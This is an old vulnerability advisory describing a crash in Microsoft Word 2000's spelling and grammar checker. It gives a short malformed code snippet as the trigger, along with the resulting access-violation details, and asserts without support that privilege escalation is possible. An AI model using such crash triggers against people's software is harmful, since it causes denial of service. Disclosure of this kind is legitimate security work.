Microsoft Word 2000 (9.0.6926 SP-3) Local crash
-------------------------------------------------

Release Date:
14-10-2003

Description:
---------------
Some vulnerabilities has been identified in Ms word 2000, which allows malicious users to crash the application. This can be possibly exploited by local users to escalate their privileges on the system.

The vulnerability is caused when a user try to insert some C code inside a document.

Exploit:
--------
Open a Word 2000 document and PASTE the following code inside:

{ 
     int i,x;
	 
	die m$


Ms-word will crash and the error message will be generated is:
"The instruction at "0x05291e6b" referenced memory at "0x00000000. The memory couldn't not be "read""
By debugging the program we get the message: "Unhandled exception in Winword.exe(MSGRSW32.dll):0xC0000005:access violation.
"06B41E6B   mov         eax,dword ptr [ecx]"

If the application don't crash use the Spelling and grammar check tool to scan the code.(The fault exists in Spelling and grammar check tool).

Disclaimer:
The author(s) does(do) not have any responsibility for any malicious
use of this advisory or proof of concept code. The code and the
information provided here are for educational purposes only.
The author(s) will NOT be held responsible for any direct or 
indirect damages caused by the information or the code
provided here.

Vendor Status:
Not responding


Credit:
Dr_insane


Feedback
Please send suggestions, updates, and comments to:

Dr_insane
http://members.lycos.co.uk/r34ct/
dr_insane@pathfinder.gr